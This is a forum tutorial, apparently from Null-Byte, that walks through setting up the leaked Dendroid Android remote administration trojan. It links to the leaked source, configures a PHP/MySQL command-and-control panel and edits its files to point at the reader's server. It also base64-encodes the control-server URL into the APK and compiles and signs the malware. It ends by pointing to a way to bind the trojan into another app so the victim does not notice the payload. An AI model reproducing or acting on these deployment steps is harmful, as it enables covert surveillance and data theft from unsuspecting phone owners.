This is my first How-To on Null-Byte, so I hope it's not too complicated written, because I am not a native english speaker. I don't use pictures, but this Tutorial is a good supplement for my updated Tutorial here.
This Tutorial shows you how to set up the old (First leaked in March 2014) but functional Remote Administration Tool for Android "Dendroid". It was first offered on black markets for 300$, but after the leak you can get it for free: http://ge.tt/2nSvLv82/v/0. If you prefer Open-Source Tools you can either use the github Link: https://github.com/qqshow/dendroid.
If you need some pictures of the whole process you can use
Required:
First you need the Dendroid Source, given abouth.
Then you need the Android SDK and Eclipse with Android ADT: SDK Tools Only http://developer.android.com/sdk/index.html#Other and Android ADT for Eclipse (Of course you need Eclipse too). Installation of them is explained later.
And at least you need a Webserver with PHP and MySql. For example http://bplaced.net
Setting Up the Web Panel
I will use bplaced.net as an example for setting up the webserver:
- Create an Account (The username is the Domain of your Server)
- Now You see the control panel of your Webserver
- Navigate to http://www.bplaced.net/?handler=mysql and add a MySql database
- Now go to phpmyadmin (phpmyadmin.
.bplaced.net) - Select your Database on the left side of phpmyadmin and then click on import at the top and add the Sql file located in Dendroid>Dendroid Panel>Other files. This should add the required Tables
Navigate to the Dendroid Panel Folder and then to the Folder "Panel". Open applysettings.php, blockbot.php ,deletebot.php ,deletefile.php ,deletepics.php ,functions.php, table.php, clearawaiting.php, clearmessages.php In your text editor of your choice. In every file you will see $url = "http://pizzachip.com/rat/"; Change this adress with the adress of your Webserver, for example: $url = "http://dendroid.bplaced.net";
Open get.php, get-functions.php, new-upload.php ,upload-pictures.php ,find the line { if($GET'Password' == "keylimepie") } Change keylimepie to your Database password assigned in Step 3
Open reg.php and delete the script. The whole Script has to be this:
$validDomain = "true";
?>
Now control the files whether they are correct configured. If they are wrong configured Dendroid wont work!
Upload
If you are sure everything went right, you have to upload the content of the folder Dendroid Panel to your webserver. I suggest to use FileZilla, which is easy to understand. For example if you use bplaced, the login credentials are: Server:
On the left side you can see your files and on the right side you see the files of your webserver. Delete the Files of your webserver and then copy the content of your Dendroid Panel folder to the webserver.
Dendroid Setup
Navigate in your browser to your webserver
You should be greeted with a setup form.
The required Settings:
Database Username: Your username of the Sql Database
Database Password: Your Password of the Sql Database
Database Host: Host of your Sql Database (In bplaced.net: localhost)
Database Name: Your Database name (In bplaced.net: Username of your account)
Bot List Refresh Time & File List Refresh Time & Message Box Refresh Time: Set all to 10
Username: Use the username you want to use for logging in to the control panel
Password: Same for the Password
Bot Offline Time: 10
Time Zone: Is clear, isn`t it?
Message Box Font Size: 10
Now continue
Setting Up the Dendroid Apk
Now you have to open the SDK Manager you have downloaded at the start. You can download everything you want, but important is the API 10.
Set up the ADT for Eclipse. This is a good Tutorial for this: http://www.instructables.com/id/How-To-Setup-Eclipse-for-Android-App-Development/step5/Obtain-Eclipse-IDE/ Follow the instructions till step 9.
Click File > New > Project > Android > Android Project From Existing Code > Next > Browse > Open the path to the Dendroid source then Dendroid Apk > Finish
Click the Drop Down Arrow for Dendroid > src > com.connect > Then click MyService To Open it.
Use base64encode.org to encode your url and the Password of your webserver. Change the variables encodedURL and backupURL to your encoded webserver URL, but pay attention that you use for example http://dendroid.bplaced.net and nothttp://dendroid.bplaced.net/
This is required to get Dendroid running.
Paste the encoded Password in the Password Field.
Now click on project>properties. Here you have to ckeck the API level 10 or Android 2.3.3, to get compiling working.
Click on your project in the project Manager on the left side of Eclipse and press F2 to rename the Project to "Dendroid". Then Click File > Export > Android > Export Android Application > Select Dendroid.
Click Ok, then next. Now check "Create new keystore". The location and the password don't matter. Click next again, then use everything as name and password. The validity can be 1000 Years. Now you can change the destination of the output apk and finish the compilation.
Optional: Binding the Dendroid Apk to Another Apk
I recently developed a method to bind the Dendroid Apk with another Apk. You can find the Post here! The Hiding Apk will work as well as installed without Dendroid, so the victim wont identify the payload.
Congratulations!
You just completed the setup of Dendroid apk. If you have Problems or get Errors when following these Instructions feel free to pm me. I will try to help as much as I can!
~Thogs
Comments
No Comments Exist
Be the first, drop a comment!